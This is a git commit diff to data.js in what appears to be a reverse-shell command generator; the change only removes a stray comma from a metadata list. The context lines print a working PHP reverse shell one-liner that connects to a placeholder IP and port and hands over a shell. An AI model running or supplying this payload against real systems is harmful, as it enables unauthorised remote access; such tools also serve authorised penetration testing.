Update data.js

This commit is contained in:
Ryan Montgomery 2024-10-31 18:36:58 -04:00 committed by GitHub
parent 3d30d35360
commit 7c759e32ad
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -174,7 +174,7 @@ const reverseShellCommands = withCommandType(
{
"name": "PHP exec",
"command": "php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"{shell} <&3 >&3 2>&3\");'",
"meta": ["linux", , "mac"]
"meta": ["linux", "mac"]
},
{
"name": "PHP shell_exec",